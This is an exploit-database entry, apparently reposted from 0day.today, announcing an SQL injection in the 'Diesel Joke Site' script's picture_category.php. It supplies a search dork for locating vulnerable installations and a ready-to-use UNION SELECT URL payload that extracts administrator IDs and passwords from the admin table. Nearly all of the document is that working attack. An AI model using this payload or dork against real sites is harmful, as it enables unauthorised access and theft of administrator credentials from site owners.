id: 3690
date: 09/17/2008
title: Diesel Joke Site (picture_category.php id) SQL Injection Vulnerability
author: sarbot511
cves: 

======================================================================
Diesel Joke Site (picture_category.php id) SQL Injection Vulnerability
======================================================================


################## sarbot511 #########################################################
#
#
#              jokes script  Remote SQL Injection Exploit
#
#    Founded by : sarbot511 
#    Dork: "All Rights Reserved. Powered by DieselScripts.com" 
#
##### Vuln Code: ###################################################################
#
#
###### Exploit #####################################################################
#
#   http://www.target.com/[path]/picture_category.php?id=-1%20union%20select%201,aid,3,4,5,6,7,8,apass,10,11,12%20from%20admin/*
#
#############################################################################



#  0day.today [2023-03-25]  #